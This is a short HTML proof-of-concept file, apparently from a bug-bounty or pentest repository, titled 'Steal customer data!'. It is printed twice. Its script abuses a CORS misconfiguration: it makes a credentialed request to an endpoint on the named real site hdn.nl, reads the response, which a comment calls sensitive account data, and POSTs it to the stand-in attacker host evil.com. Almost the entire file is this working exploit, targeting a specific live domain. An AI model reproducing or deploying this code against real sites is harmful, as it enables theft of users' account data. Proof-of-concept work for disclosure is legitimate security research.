andripwn/poccors.html

## poccors.html
<!DOCTYPE html>
<html>
<body>
<center>
<h3>Steal customer data!</h3>
<html>
<body>
<button type='button' onclick='cors()'>Exploit</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; // Sensitive data from hdn.nl about user account
document.getElementById("demo").innerHTML = a;
xhttp.open("POST", "http://evil.com", true);// Sending that data to Attacker's website
xhttp.withCredentials = true;
console.log(a);
xhttp.send("data="+a);
}
};
xhttp.open("GET", "https://www.hdn.nl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hdn.nl%2Fkwartaaloverzicht-q3%2F", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
	<!DOCTYPE html>
	<html>
	<body>
	<center>
	<h3>Steal customer data!</h3>
	<html>
	<body>
	<button type='button' onclick='cors()'>Exploit</button>
	<p id='demo'></p>
	<script>
	function cors() {
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	var a = this.responseText; // Sensitive data from hdn.nl about user account
	document.getElementById("demo").innerHTML = a;
	xhttp.open("POST", "http://evil.com", true);// Sending that data to Attacker's website
	xhttp.withCredentials = true;
	console.log(a);
	xhttp.send("data="+a);
	}
	};
	xhttp.open("GET", "https://www.hdn.nl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hdn.nl%2Fkwartaaloverzicht-q3%2F", true);
	xhttp.withCredentials = true;
	xhttp.send();
	}
	</script>
	</body>
	</html>